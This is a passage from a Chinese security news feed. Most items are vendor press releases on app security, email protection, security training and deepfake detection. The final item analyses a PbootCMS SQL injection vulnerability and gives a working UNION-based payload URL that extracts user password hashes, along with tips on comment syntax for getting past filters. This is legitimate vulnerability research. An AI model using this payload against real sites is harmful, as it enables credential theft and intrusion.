部署梆梆安全全渠道应用安全监测解决方案后，我们多个平台的安全问题得到有效解决，实现了跨平台安全监测标准化，保障了政务信息的安全。该产品在防护Web API攻击、移动应用风险、H5外链威胁和小程序数据泄露方面表现突出，其高效的监测预警机制帮助我们快速应对安全事件，预防风险，保护政府及公民信息安全。

——某政府行业客户

推荐与建议

全渠道应用安全解决方案正通过技术创新和多渠道覆盖，显著提升企业的安全防护能力和运营效率。

梆梆安全全渠道应用安全解决方案是一个全面且专业的安全防护体系，适合在当前数字化转型背景下面临多渠道应用安全挑战的企业。该方案具有全面的API安全防护、多渠道安全一致性、跨渠道攻击防护、用户身份验证与授权管理*、实时安全事件响应、技术兼容性与集成能力、用户体验与安全的平衡等特性，能够帮助企业有效应对多渠道应用安全挑战，保护数据安全，保障业务的稳定运行。

值得一提的是，该方案已经在政府机构、电商企业和金融行业等客户得到成功应用，并且获得了用户的认可。

未来，随着数字化转型的加速，全渠道应用安全解决方案的需求将持续增长。企业需要不断加强技术研发和创新，以应对日益复杂的网络安全威胁。此外，随着5G网络的发展，对能够分析加密流量的全渠道平台软件解决方案的需求也在增加。

", "pubDate": "Mon, 30 Dec 2024 15:29:16 +0800", "author": "梆梆安全" }, { "title": "Check Point：通过高级电子邮件防护确保业务安全", "link": "https://www.4hou.com/posts/wxgz", "description": "

随着5G的发展、个人智能设备的不断普及，人们日常沟通的方式也变得更加多样。然而，在商务领域，电子邮件仍然是企业员工内外部正式沟通的首选方式。正因如此，电子邮件也连续多年成为个人以及企业遭受黑客攻击的最主要环节之一。在今年的一份第三方研究报告指出，我国企业邮箱注册独立域名虽略有减少，降至约528万个，但活跃用户规模却保持增长，已超过1.9亿，显示出企业邮箱应用市场的持续稳定发展趋势。值得注意的是，全年企业级邮箱用户共收发电子邮件约7800亿封，但正常邮件占比仅为46%左右，垃圾邮件、钓鱼邮件、带毒邮件等恶意邮件占比总计过半，表明安全问题依旧严峻。

今年9月 Check Point 发布的《2024 年安全报告》中显示，电子邮件仍是初始感染的主要途径，88% 的恶意文件通过电子邮件进行传播。鉴于这一惊人的统计数据以及用于生成定制网络钓鱼电子邮件的 AI 工具的激增，企业亟需采取全面的策略来保护其敏感数据和员工。用户投资高级电子邮件防护，不仅仅是为了获得技术升级，更将是一项战略性业务决策，可显著改善企业运营效率。

无效电子邮件防护的代价

企业员工每天都要花费大量时间回复电子邮件，这些电子邮件大多来自同事和业务伙伴。然而，垃圾邮件发送者和网络犯罪分子能够轻而易举地侵入员工的收件箱。

如果企业的电子邮件安全防护工具薄弱或不足，则可能面临超乎想象的严峻风险。电子邮件安全防护不到位可能会导致：

· 恶意消息屏蔽延迟。包括 Microsoft Defender 在内的传统安全网关可能边分析电子邮件边将其发送到收件箱，然后在发现异常后屏蔽恶意消息。这种处理流程为用户点击恶意消息提供了可能性。

· 工作场所干扰增加，因为员工可能要鉴别和分析潜在的网络钓鱼电子邮件，然后手动报告网络钓鱼攻击。这不仅会妨碍员工专心处理核心任务，也会由于误报产生不必要的安全资源消耗。

· 数据泄露，这可能会造成巨大的经济损失和无法弥补的声誉损害。

· 违规，这可能导致监管处罚，或会影响财务收益。

· 安全团队将大量时间浪费在处理误报、分析网络钓鱼电子邮件以及回复员工的网络钓鱼报告上。

Check Point 中国区技术总监王跃霖表示：“员工培训再多也可能无法有效防止网络钓鱼点击。在发送电子邮件前，需要检查 300 多个特征，而员工既无头绪，也无技能和时间进行分析。如果企业或员工端点工具无法阻止从点击的 URL 下载恶意文件，那么安全计划将功亏一篑。从企业运营角度上看，对每位员工进行系统化培训，从而在处理邮件时为企业筑起一道安全防线的思路很难实现。”

采用高级电子邮件安全防护解决方案

高级电子邮件安全防护解决方案（尤其是可信厂商提供的可靠解决方案）不仅能够有效保护企业安全，而且还可提升运维效率。在人工智能 (AI) 和机器学习 (ML) 技术的强大支持下，最先进的电子邮件防护解决方案可以实时识别并抵御威胁。

王跃霖指出：“AI 电子邮件安全防护工具能够分析电子邮件的 300 多点特征信息，包括电子邮件主题行的细微差别、以前的电子邮件历史记录、SMTP 特征及电子邮件正文内容，可高效发现基于网关的传统电子邮件系统可能会忽略的异常情况。” 在检测到潜在威胁后，高级电子邮件解决方案不会将相关电子邮件发送到收件箱，而会隔离可疑电子邮件、拦截有害附件、删除危险链接，甚至通知 IT 团队需要执行进一步调查。因此，高级电子邮件安全防护解决方案能够有效缓解电子邮件安全风险，防患于未然。
正确选择电子邮件防护解决方案

鉴于电子邮件安全防护至关重要，企业必须确保做出明智的选择。王跃霖表示：“验证高效电子邮件解决方案的最简单方法就是将其作为最后一道防线安装在 Defender 或任何传统网关后面。最后一道防护解决方案通常能拦截大量攻击，用户可以根据所处环境中的电子邮件风险和挑战做出下一步决策。

在恶意邮件横行的当下，企业应选择一家既提供先进解决方案又注重用户体验的电子邮件安全防护厂商。自 2021 年发布至今，Check Point 的 Harmony Email & Collaboration 安全平台不断与时俱进，新增约 150 项功能，持续致力于为用户提供业内领先的安全解决方案。Check Point相信，通过“预防为先”的安全理念，用户能够在保障安全的前提下，享受邮件沟通通畅带来的便利与高效。

", "pubDate": "Mon, 30 Dec 2024 11:26:35 +0800", "author": "Check Point" }, { "title": "梆梆安全|超级APP如何防范外链攻击", "link": "https://www.4hou.com/posts/rp7W", "description": "

随着数字化转型在各行各业的深入发展，手机应用程序（APP）的功能日益多样化，尤其是在政务、金融等领域，超级APP所提供的服务范围越来越丰富。然而，针对这类APP的网络攻击事件也随之频发。近期，梆梆安全收到了多起客户反馈，均指出其APP被植入了恶意外链，这些链接大多导向色情和赌博等不良内容。

案例一

有学生家长反映，通过当地政务服务APP查询学生入学登记信息时，点击“XX主题教育平台”栏目时，突然跳转到色情网站。管理运维APP的公司回应称，客户端链接网站出现异常，怀疑该网站被篡改，公司已立即删除了该链接。

$\"截屏2024-12-30$

案例二

深圳李女士在使用某运营商APP时，订单页突然弹出涉黄、赌博等违法信息。官方客服回应称，问题源于李女士的路由器被攻击、wifi被劫持。建议李女士及时更改WiFi连接密码及管理密码，同时升级路由器固件。

$\"截屏2024-12-30$

超级APP外链攻击的主要方式

$\"截屏2024-12-30$

梆梆安全通过对攻击过程进行溯源分析及黑灰产研究发现，针对APP外链的主要攻击方式有三种，分别是：

1、网络链路攻击：包括DNS劫持、HTTP数据劫持、WiFi劫持等；这种是目前最为常见的攻击方式，重点表现为受害者连接了一些公共WIFI，而这些WIFI被攻击者掌握，在网络链路中植入恶意广告内容。

2、终端攻击：终端中存在病毒木马，以及违规应用，自动拦截终端流量植入广告；这种情况主要出现在一些老年人的手机上，而这些手机往往来源于非正规的二手渠道。

3、服务端攻击：通过注入攻击等手段来获取Web站点管理员权限，进而直接篡改网页内容；虽然这种攻击方式的技术门槛相对较高，但考虑到超级APP中可能嵌入了其他第三方站点，而这些第三方外链站点的安全防护能力各不相同，因此仍存在安全风险。

梆梆安全针对外链攻击防护思路

$\"截屏2024-12-30$

梆梆安全全渠道应用安全监测平台通过在前端植入安全SDK，该SDK通过APP初始化后，动态监控APP内部Webview的流量访问行为，通过同步/异步分析模式，针对APP内的H5外链访问情况进行动态监控/管控，及时发现异常行为；同时，全渠道应用安全监测平台支持构建白名单机制，仅允许授权内的域名/IP进行应用进行加载访问，支持针对加载内容进行动态检查，及时发现违规展示内容，针对风险情况及时上报后端平台进行预警展示。

梆梆核心能力及优势

1、域名/IP动态管控：构建域名/IP白名单机制，仅允许授权范围内的地址加载展示；

2、动态内容监控：针对H5加载内容进行特征匹配检查，及时发现展示内容中的违禁内容；

3、动态风险管控：通过策略配置，及时针对前端异常加载内容进行同步/异步多样化处置，支持禁止加载或弹窗提醒；

4、风险态势感知：及时上送终端风险数据，利用大数据计算及关联分析，及时展示风险情况，掌握终端及站点异常风险态势；

综上所述，超级 APP 凭借其庞大的用户基础和丰富的功能生态，成为网络攻击的潜在目标。梆梆安全建议超级 APP 运营方需加强对外链来源的验证与风险评估，完善用户点击提醒机制；同时，持续更新安全防护策略，对应用内的授权、跳转流程进行严格的安全审查与漏洞修复，以降低外链攻击带来的安全风险，保障用户数据与使用体验的安全稳定。

", "pubDate": "Mon, 30 Dec 2024 10:44:59 +0800", "author": "梆梆安全" }, { "title": "360校企合作再添佳绩，苏安院-网络安全与应急响应现代产业学院揭牌", "link": "https://www.4hou.com/posts/pnVm", "description": "

近日，360数字安全集团联合江苏安全技术职业学院、北京天雨乔松教育科技有限公司共同基于苏安院-网络安全与应急响应现代产业学院的合作共建完成战略签约及揭牌仪式。依托现代产业学院提供的创新平台与创新资源，校企三方将围绕智慧校园、数字安全、人工智能、应急响应等多方面开展合作，致力于促进科教融汇、产教融合与高质量卓越人才培育，为关键技术攻关、新型数字城市建设、数字徐州产业升级提供充分助力。

$\"图片5.png\"/$

揭牌仪式现场，360数字安全集团副总裁、ISC学院主理人卜思南，江苏安全技术职业学院校长李桂萍，北京天雨乔松教育科技有限公司董事长房宇等领导代表出席。

$\"图片6.png\"/$

江苏安全技术职业学院校长李桂萍对一行的到来表示热烈欢迎。她表示，江苏安全技术职业学院作为全国应急安全职业教育联盟的重要发起单位之一，是华东地区以安全类专业为特色，技术类专业为主体的重点职业技术学院。多年来，学院积极融入国家、省市应急管理体系，为推动行业发展进步贡献了智慧和力量。此次针对江苏省徐州市新兴产业链、现代服务产业链的实际需求，三方共建现代产业学院，将进一步推动校企深度融合，助力实现新型人才培养、技术科学研究、服务区域经济。

360数字安全集团副总裁、ISC学院主理人卜思南在致辞中谈到，近年来，360基于近20年在安全和AI领域的经验沉淀，和全国多所院校开展了实战型人才培养方面的合作，深度参与教学活动，引入企业项目进行校内实训，承担数字安全领域师资培训，承办国家级技能大赛，并参与编写国家相关专业领域的实训教学标准，不断探索人才培养的新模式。

针对此次现代产业学院的成立，360将紧密围绕徐州市网络安全产业发展的人才需求，与校企开展多领域的务实合作，确保能够培养出一批高质量、高技能、高层次的实战型人才，并为这些人才提供参与一线攻防项目、城市网络安全建设的机会，助力学校实现从育人到用人全过程的无缝衔接。

北京天雨乔松教育科技有限公司董事长房宇谈到，网安专业人才培养需要构建基于国家网络安全需求的创新培养模式，此次合作三方将秉承“优势互补、资源共享、讲求实效、互惠双赢、共同发展”的原则，为学生提供理论与实践相结合的教育环境，促进学生技能的全面发展。

未来，校企三方将紧密围绕数字安全产教融合发展及公共应急响应监测与防护的实际需求，汇聚跨区域产教资源，探索创新数字安全人才培养新模式，共建高质量教学资源，实现“双元双向”人才培养机制，为国家数字化建设贡献力量。

", "pubDate": "Fri, 27 Dec 2024 17:16:24 +0800", "author": "企业资讯" }, { "title": "“美亚柏科杯” 数据安全管理员职业技能竞赛总决赛在厦门盛大开幕", "link": "https://www.4hou.com/posts/omJk", "description": "

鹭岛风情天下秀，网安人才共潮涌。12月26日，由中国安全防范产品行业协会（以下简称中安协）和中国就业培训技术指导中心联合主办，国投智能(厦门)信息股份有限公司承办，厦门市美亚柏科信息安全研究所有限公司、厦门安胜网络科技有限公司协办的2024年全国行业职业技能竞赛——第三届全国数据安全职业技能竞赛暨第三届全国安防行业职业技能竞赛“美亚柏科杯”网络安全管理员职业技能竞赛总决赛在福建省厦门市美亚柏科培训基地盛大开幕。

$\"微信图片_20241227160147.jpg\"/$

开幕式现场

中安协副理事长陈朝武，福建省公共安全防范行业协会会长陈水利，浙江省公安厅科技信息化局原政委吴敏萍，新疆克拉玛依市公安局原副局长冯杰忠，公安部信息安全等级保护评估中心原副主任、研究员毕马宁，北京航空航天大学副教授洪晟，公安部第三研究所物联中心副研究员宋蕾，上海公安学院副教授朱得旭，浙江宇视首席安全官周欣如，国投智能（厦门）信息股份有限公司党委副书记、总经理周成祖，厦门市美亚柏科信息安全研究所有限公司总经理王志永、教育事业线总经理高滨、智慧安防事业部总经理黄仝宇，厦门安胜网络科技有限公司副总经理陈志飞以及来自全国各地安防协会的相关领导嘉宾、竞赛专家裁判团队和各分赛区晋级选手等参加了本次开幕式。

开幕式在庄严雄壮的国歌声中拉开序幕，为参赛者们的精彩表现注入了无限的动力。

$\"微信图片_20241227160218.jpg\"/$

中国安全防范产品行业协会副理事长陈朝武

中安协副理事长陈朝武在致辞中代表协会对各位来宾的到来表示热烈欢迎，并感谢国投智能（厦门）信息股份有限公司对大赛的鼎力支持。陈朝武副理事长指出，当今世界网络安全风险不断激增，网络强国建设迫切需要打造一支高素质、创新型、复合型的网络安全人才队伍。技能人才是支撑中国制造、中国创造的重要力量，是加快培育发展新质生产力、推动行业高质量发展、全面建设社会主义现代化国家的生力军。她指出，本次竞赛以习近平新时代中国特色社会主义思想为指导，深入学习贯彻习近平总书记关于技能人才工作的重要指示批示精神，是促进网络安全技能人才培养、推动职业技能培训和弘扬工匠精神的重要舞台，对营造劳动光荣、技能宝贵，更好服务就业创业和经济发展具有重要的支撑作用。她希望广大参赛选手赛出风格、赛出水平，奋勇拼搏、取得优异成绩，实现以赛促训、以赛促学，展现新时代安防技能人才的卓越风采，为中国式现代化作出应有贡献。

$\"微信图片_20241227160247.png\"/$

福建省公共安全防范行业协会会长陈水利

福建省公共安全防范行业协会会长陈水利在致辞中对大赛的举行表示热烈祝贺。他指出，网络安全关乎国家安全、经济发展和社会稳定，是新技术新产品新场景大规模应用、专业性强的领域，对高素质高技能人才的需求尤为迫切。此次大赛是积极响应党中央和习近平总书记关于技能人才工作和职业技能竞赛工作的重要指示批示精神，贯彻落实网络安全国家战略，推动科技创新、筑牢网络安全防线、助力行业发展和公共安全建设的重要举措。陈水利会长希望大赛裁判公正执裁、选手稳健发挥，并祝大赛取得圆满成功。

$\"微信图片_20241227160317.png\"/$

国投智能(厦门)信息股份有限公司党委副书记、总经理周成祖

国投智能(厦门)信息股份有限公司党委副书记、总经理周成祖代表赛事承办方向远道而来的领导嘉宾以及踊跃参赛的各位选手表示热烈欢迎！他指出，随着新一代信息技术发展与网络强国战略深入推进，网络安全人才培养与实战能力建设已成为新时代的新命题。他介绍，国投智能始终将“人才培养”纳入公司整体战略布局，不断探索产学研协同育人的新模式、新机制，常年承办网络安全、电子数据取证等高技能竞赛及行业论坛，持续为提升我国网络安全、数据安全领域的技术水平和能力，培养数据安全管理人才贡献力量。他预祝本次大赛取得圆满成功，各位参赛选手取得理想成绩。

$\"微信图片_20241227160347.jpg\"/$

浙江省公安厅科技信息化局原政委、大赛裁判长吴敏萍

$\"微信图片_20241227160412.png\"/$

参赛选手代表叶建辉

随后，吴敏萍裁判长代表全体裁判宣誓，参赛选手叶建辉代表全体选手宣誓。

$\"微信图片_20241227160425.png\"/$

倒计时启动仪式

陈朝武、陈水利、周成祖、吴敏萍、冯杰忠、毕马宁六位领导共同启动倒计时环节，2024年全国行业职业技能竞赛——第三届全国数据安全职业技能竞赛暨第三届全国安防行业职业技能竞赛“美亚柏科杯”网络安全管理员职业技能竞赛总决赛正式开始。

“美亚柏科杯”网络安全管理员职业技能竞赛是2024年全国行业职业技能竞赛——第三届全国数据安全职业技能竞赛暨第三届全国安防行业职业技能竞赛的4大赛项之一，属于国家二类职业技能赛事。竞赛以“技能成才技能报国”为主题，旨在着力提高职业技能竞赛科学化、规范化、专业化水平，实现以赛促学、以赛促训、以赛促评、以赛促建，为全面提高安防技能人才素质、推动行业数字化转型、高质量发展，建设现代化产业体系提供有力人才保障。

本届网络安全管理员职业技能竞赛共有1200余名选手经过综合赛区选拔赛的激烈角逐，脱颖而出进入总决赛。总决赛为期两天，设职工组和学生组两个组别，进行理论知识与技能操作两部分的考核。理论知识考试包括计算机知识、网络知识、网络安全知识、加密技术、操作系统知识、数据恢复知识、网络安全相关法律法规等；技能操作包括安防网络安全基础场景、安防网络漏洞场景、安防网络运维场景等模块。总决赛设特等奖（前三名）、一等奖、二等奖、三等奖、优秀奖，进入总决赛获三等奖及以上奖项比例控制在50％以内，获奖选手将按相关规定晋升职业技能等级。

此次竞赛不仅为参赛选手提供了一个展示自身技能和风采的舞台，还将激励更多网络安全人才特别是青年人走技能成才、技能报国之路。竞赛将选拔和培养出更多具备高超技能、创新思维和强烈责任感的网络安全人才，为推动安防行业的持续发展、维护国家网络安全贡献力量。

希望参赛选手继续奋发拼搏，敢为人先、超越自我，以最饱满的热情向赛项最高荣誉发起冲击！

文章来源自：中国安防协会

", "pubDate": "Fri, 27 Dec 2024 16:15:26 +0800", "author": "企业资讯" }, { "title": "“顶流”带货是真是假？美亚内容鉴真平台帮你守住钱袋子！", "link": "https://www.4hou.com/posts/nlJP", "description": "

12月20日，由国家语言资源监测与研究中心、商务印书馆、新华网联合主办的“汉语盘点2024”活动在京揭晓，2024“年度字词”年度国内字为“智”，年度国内词为“新质生产力”。2024年，国投智能以智提质，始终坚持以科技创新引领新质生产力发展，在人工智能领域持续突破。

近年来，人工智能技术作为新质生产力的关键组成部分，经历了飞速的发展，其应用领域也日益广泛且多元化。其中，深度合成和生成式AI技术作为人工智能领域的创新应用技术，以其较低的应用门槛、较强的娱乐属性、丰富的应用场景备受关注。但随着深度合成和生成式AI技术的开放开源、深度合成和生成产品及服务的增多，通过深度合成和生成式AI技术制造虚假音视频图像进行诬陷、诽谤、诈骗、勒索等违法行为已屡见不鲜。

近日，有媒体报道，不法分子应用AI换脸技术，假冒张文宏医生向老人售卖医疗产品，老人信以为真，不仅下了单还转发给了很多群。张文宏回应称，这样的卖货账号已出现多个，而且一直在变，他多次向平台投诉，但都收效甚微。

$\"微信图片_20241227155222.jpg\"/$

通过国投智能自主研发的“美亚内容鉴真平台”微信小程序，对视频进行检测，可以证实视频为AI合成。

作为网络空间安全与社会治理领域国家队，国投智能2017年成立AI研发中心，为了应对利用人工智能技术可能带来的安全问题，2019年针对深度合成技术又特别成立专项研究团队，2024年公司还提出了“All in AI”战略，用AI技术全面赋能产品。通过对深度合成和生成式AI技术的深入研究以及在人工智能安全方向的经验积累，公司AI团队自主研发深度伪造视频图像检测鉴定的核心引擎，打造出一系列视频图像检测鉴定的一体化智能装备“AI-3300慧眼视频图像鉴真工作站”以及“美亚内容鉴真平台”微信小程序等。

“美亚内容鉴真平台”微信小程序是国投智能全资子公司美亚柏科研发的一款针对AI合成、生成的图像、视频、文本等虚假信息的检测小工具，致力于帮助用户查证信息的准确性。目前支持ChatGPT、ChatGLM、Qwen、Moss等13种国内外主流大模型产品生成文本的检测；支持Stable-Diffusion、Midjourney、DALLE、FLUX等30余种主流算法生成图像的检测；支持Sora、Open-Sora、Runway Gen-2等10余种主流算法生成视频的检测；支持DeepfaceLab、FOMM、Wav2Lib等40余种主流AI合成算法所合成的图像和视频的检测。

$\"微信图片_20241227155346.jpg\"/$

美亚内容鉴真平台

AI-3300慧眼视频图像鉴真工作站（以下简称“慧眼”）是一款自主研发的以人工智能技术为核心的视频图像检测鉴定一体化智能装备，配备了美亚柏科人工智能团队自主研发的核心AI智能检测引擎，支持当前绝大部分深伪视频图像篡改方法的检测，检测精度处于国内领先水平。“慧眼”涵盖40余种视频图像真伪鉴定算法，近10种深伪鉴定算法，同时具有智能鉴定和专业鉴定两种鉴定模式，支持卷宗管理和鉴定报告生成，为司法鉴定人员提供一站式视频图像检验鉴定服务。

“慧眼”不仅对利用传统伪造手段篡改的影像能生成理想的鉴定效果，而且对利用深度伪造技术进行换脸、美颜、生成人脸、同图或异图复制篡改的影像具有十余种理想的鉴定效果。"慧眼"在深伪检验鉴定中处于国际领先水平，可为公安、司法行业及相关领域的技术人员和影像鉴定人员提供一站式影像真伪检验鉴定解决方案。

$\"微信图片_20241227155419.png\"/$

AI-3300慧眼视频图像鉴真工作站

国投智能将持续聚焦生成式人工智能和AI生成内容的检测识别技术，踔厉奋发，持续发力，按照相关管理要求，针对深度合成生成文本、视频、图像的检测鉴定技术、生成式人工智能技术、人工智能安全取证技术等方面的应用需求，不断打磨推出更为安全、可信、可靠的人工智能技术产品，为打击利用人工智能的新型涉网犯罪，提供有力的技术武器，为维护和保障人工智能的健康发展和规范应用贡献力量！

", "pubDate": "Fri, 27 Dec 2024 15:59:29 +0800", "author": "企业资讯" }, { "title": "国投智能（美亚柏科）在第五届中国人工智能大赛斩获三个赛道A级证书", "link": "https://www.4hou.com/posts/mkXn", "description": "

12月20日，第五届中国人工智能大赛成果发布会在厦召开，国投智能股份董事长滕达应邀出席。公司人工智能团队表现突出，在“大模型安全攻防赛”“AIGC视频检测赛”“人工智能赋能政府服务场景能力验证赛”三个赛道中荣获最高等级A级证书（金奖）。

$\"微信图片_20241227154458.jpg\"/$

滕达董事长与获奖团队代表合影

美亚柏科智慧安防事业部总经理黄仝宇博士在下午举行的“人工智能赋能行业应用创新论坛”上作《AI助力打造公共安全新质生产力》主题演讲。他表示，AI大模型出现和落地给安防行业带来了新的发展机遇，它将引领智慧安防的新未来。AI大模型赋能安防，使安防系统具备强大的理解和分析能力，大幅提升现有安防系统的智能化水平和效率，并拓展安防应用的深度和广度，为发展安防新质生产力赋能。

$\"微信图片_20241227154510.jpg\"/$

今年9月，在国家互联网信息办公室、公安部指导下，厦门市人民政府主办的第五届中国人工智能大赛正式启动，围绕人工智能安全治理和创新发展两大主线设置了赛题。

$\"微信图片_20241227154554.jpg\"/$

$\"微信图片_20241227154603.jpg\"/$

作为网络空间安全与社会治理领域国家队，国投智能2017年成立AI研发中心，为了应对利用人工智能技术可能带来的安全问题，2019年针对深度合成技术又特别成立专项研究团队，2024年，公司提出“All in AI”战略，整合各产品线的人工智能研发力量，新组建人工智能研究院，突出围绕公共安全大数据和电子数据取证业务需求开展人工智能大模型技术研究，支撑公司产品和技术向人工智能大模型的转型升级，构建公共安全领域的新质生产力。

基于公司在人工智能技术和公共安全业务领域长期和深度的业务知识积累，研发发布了国内首个公共安全领域大模型产品-美亚“天擎”公共安全系列大模型产品，入选 “2023中国大模型TOP70榜单”。

$\"微信图片_20241227154742.jpg\"/$

此次获奖是对国投智能在人工智能领域技术实力的高度认可。未来，国投智能将聚焦大模型技术应用、生成式人工智能和人工智能安全三个核心方向，踔厉奋发，持续发力，不断打磨推出更为安全、可信、可靠的人工智能技术产品，为打击利用人工智能的新型涉网犯罪，提供有力的技术武器，为维护和保障人工智能的健康发展和规范应用贡献力量！

", "pubDate": "Fri, 27 Dec 2024 15:49:34 +0800", "author": "企业资讯" }, { "title": "AI伪造图像鉴定能力验证计划相关通知发布！国投智能护航人工智能安全发展", "link": "https://www.4hou.com/posts/l06V", "description": "

近日，中国合格评定国家认可委员会（CNAS）秘书处发布《关于组织开展人工智能伪造图像鉴定能力验证计划的通知》，邀请从事AI伪造图像检验检测鉴定的执法机构、有关检验检测机构和从事AI伪造图像检测鉴定研究的企事业单位参加相关鉴定能力的验证，以促进人工智能（AI）安全治理行业技术发展，加强各相关机构对AI伪造图像检验鉴定的质量管理，建立不同图像鉴定方法/系统的有效性和可比性。、

$\"微信图片_20241227153957.jpg\"/$

作为网络空间安全与社会治理领域国家队，国投智能2017年成立AI研发中心，为了应对利用人工智能技术可能带来的安全问题，2019年针对深度合成技术又特别成立专项研究团队，2024年公司还提出了“All in AI”战略，用AI技术全面赋能产品。通过对深度合成和生成式AI技术的深入研究以及在人工智能安全方向的经验积累，公司AI团队自主研发深度伪造视频图像检测鉴定的核心引擎，推出了AI-3300慧眼视频图像鉴真工作站、人工智能大模型内容检测平台、“美亚内容鉴真平台”微信小程序等，全面支持人工智能生成视频图像、音频和文本等多媒体内容的检测溯源。

其中，AI-3300慧眼视频图像鉴真工作站是一款以人工智能技术为核心的视频图像检验鉴定设备，具有智能鉴定和专业鉴定两种鉴定模式，涵盖40余种鉴定算法，近10种深伪鉴定算法，针对ps篡改，深伪合成，AI生成的视频图像进行检测鉴定，支持卷宗管理和报告生成，为鉴定人员提供一站式视频图像检验鉴定服务。并且符合GA／T1021-2013《视频图像原始性检验技术规范》、GA／T 1022-2013《视频图像真实性检验技术规范》、SF/T 0119-2021《声像资料鉴定通用规范》、SF/T 0153—2023《图片真实性鉴定技术规范》、SF/T 0148-2023《合成人脸图像鉴定技术规范》等视频图像真实性、原始性、合成人脸检验鉴定技术规范标准，可有效支持本次人工智能伪造图像鉴定能力验证的要求。

$\"微信图片_20241227154035.png\"/$

AI-3300慧眼视频图像鉴真工作站

“美亚内容鉴真平台”微信小程序是国投智能全资子公司美亚柏科研发的一款针对AI合成、生成的图像、视频、文本等虚假信息的检测小工具，致力于帮助用户查证信息的准确性。目前支持ChatGPT、ChatGLM、Qwen、Moss等13种国内外主流大模型产品生成文本的检测；支持Stable-Diffusion、Midjourney、DALLE、FLUX等30余种主流算法生成图像的检测；支持Sora、Open-Sora、Runway Gen-2等10余种主流算法生成视频的检测；支持DeepfaceLab、FOMM、Wav2Lib等40余种主流AI合成算法所合成的图像和视频的检测。

$\"微信图片_20241227154148.jpg\"/$

国投智能将持续聚焦生成式人工智能和AI生成内容的检测识别技术，踔厉奋发，持续发力，按照相关管理要求，针对深度合成生成文本、视频、图像的检测鉴定技术、生成式人工智能技术、人工智能安全取证技术等方面的应用需求，不断打磨推出更为安全、可信、可靠的人工智能技术产品，为打击利用人工智能的新型涉网犯罪，提供有力的技术武器，为维护和保障人工智能的健康发展和规范应用贡献力量！

", "pubDate": "Fri, 27 Dec 2024 15:43:35 +0800", "author": "企业资讯" }, { "title": "PbootCMS前台SQL注入漏洞（下）", "link": "https://www.4hou.com/posts/ZgX8", "description": "

0x01前言

在前一篇文章中介绍了一个仍然可以用于最新版PbootCMS的老漏洞DVB-2021-2510,并对漏洞流程进行分析，给出了在有限条件下利用漏洞的方式。

本文将在前一篇文章的基础上继续给出新的PbootCMS SQL注入漏洞，并对利用方式进行更深入的探讨。

0x02漏洞分析

由于PbootCMS使用了模板的方法来组合产品页面内容，为了支持可扩展性，支持非常复杂的语法，对基础内容想了解的可以先看文章https://xz.aliyun.com/t/14090。

apps/home/controller/TagController.php文件中，会把外部传入的数据get('tag')替换模板文件中的内容。

$\"\"$

图 1

这里的get('tag')和上一篇文章中的request($key, 'vars')有一个很大的区别是没有第二个参数，我们跟进get方法，看一下没有第二个参数的传值有哪些限制。

$\"\"$

图 2

如果没有传入第二个参数，默认值为null。跟进filter方法，可以看出在filter对类型和数据的安全检查中，第二个参数为null并不会命中任何一个条件判断，也就是不会对数据值进行任何限制。这里因为$condition['d_type']为null也不会因此而报错。

$\"\"$

图 3

虽然数据类型检测，但是filter方法中仍然有对其值的过滤方式，会替换很多标签相关的内容。这里需要重点标记一下，因为后面的SQL注入要用到这里过滤不完整的标签。

$\"\"$

图 4

回到图1的代码中，外部传入的get('tag')经过方法parserPositionLabel会替换模板文件中的部分内容，跟进parserPositionLabel方法。

$\"\"$

图 5

这里外部传入的数据变成了变量$link，并且经过替换之后响应到页面的标签的href属性中。这里假设我们传入了{pboot:xxx}，只要不在图4禁止的pboot标签中，则可能导致标签注入。pboot支持的标签有很多，具体要用哪个标签来达到漏洞利用的效果，还需要继续往下面跟进。

在图1的代码中继续往下，跟进parserAfter方法，这个方法中会解析大多数pboot标签。

$\"\"$

图 6

我们这里用到的是parserListLabel方法，这个方法的主要作用是解析数据列表，至于是不是还有其它的方法也可以利用，小伙伴可以自行探索。继续跟进parserListLabel方法。

$\"\"$

图 7

如果我们传入的get('tag')的值中包含了{pboot:list}标签，则会按照parserListLabel方法中的解析逻辑对其中的值进行正则提取，并保存到变量$params中。具体parserParam的函数我就不跟了，其实就是简单的正则提取，我们继续往下跟进$params变量的处理逻辑。

$\"\"$

图 8

当$params的键名是filter时，也就是外部传入的参数为{pboot:list filter=xxx [list:link link=asd]{/pboot:list}。会把xxxx设置为变量$filter的值，继续跟下面的调用逻辑。

$\"\"$

图9

按照｜对$filter进行切割之后，其中$filter[0]会直接拼接到$where1数组的值中，从这里已经可以看出来似乎进行了SQL语句的可控拼接。继续往下看一下$where1变量的调用逻辑。

$\"\"$

图10

和上一篇文章的逻辑相似，上一篇文章的注入点在getList方法的参数$where3，这次的注入在参数$where1。跟进getList方法。

$\"\"$

图11

外部传入的$where1变量会直接进入where方法中，从图9可以看出这里的filter时一个数组，并且其键名为数字。

$\"\"$

图12

这也就导致了SQL注入漏洞。

0x03漏洞利用

从本质上来说此漏洞的漏洞利用要比上一篇文章的利用简单，因为这里不涉及对特殊字符的限制，而且这里有回显可以进行联合注入。在本地搭建的演示环境中进行测试，利用下面的payload查询ay_user表第一个用户的密码字段

http://localhost:8890/PbootCMS329?tag=xxx:%7bpboot%3alist%20filter%3d1%3d2%29UNION%2f%2a%2a%2fSELECT%2f%2a%2a%2f1,2,3,4,5,(select/**/password/**/from/**/ay_user/**/limit/**/0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c123%20scode%3d123%7d%5blist%3alink%20link%3dasd%5d%7b%2fpboot%3alist%7d

查看源代码，会在如下位置回显对应的结果信息

$\"\"$

图13

这里面有几个注意点是需要说明的

1）payload不允许用空格，因为在图7解析{pboot:list}标签时调用的parserParam方法按照空格进行截断，如下所示。

$\"\"$

图14

2) 注释符问题。对于mysql数据库，这里只能使用#单行注释，而不能使用--单行注释；对于sqlite数据库，这里只能使用--单行注释，而不能使用#单行注释。这主要还是空格的原因，我通过下面一张表来说明这个小技巧。

语句	数据库	备注
select 1 --a	mysql	语法错误，--后面必须有空白字符
select 1 --/**/a	mysql	语法错误，--后面必须有空白字符
select 1 -- a	mysql	语法正确
select 1 #a	mysql	语法正确
select 1 # a	mysql	语法正确
select 1 --a	sqlite	语法正确，--后面可以没有空格
select 1 -- a	sqlite	语法正确
select 1 #a	sqlite	语法错误，不支持#注释
select 1 # a	sqlite	语法错误，不支持#注释

因为PbootCMS的payload不允许使用空格，所以造成了一个很奇怪的结论。

3) 在实网环境下，不同的站点union select的函数是不一样的，要基于实际情况进行调整。

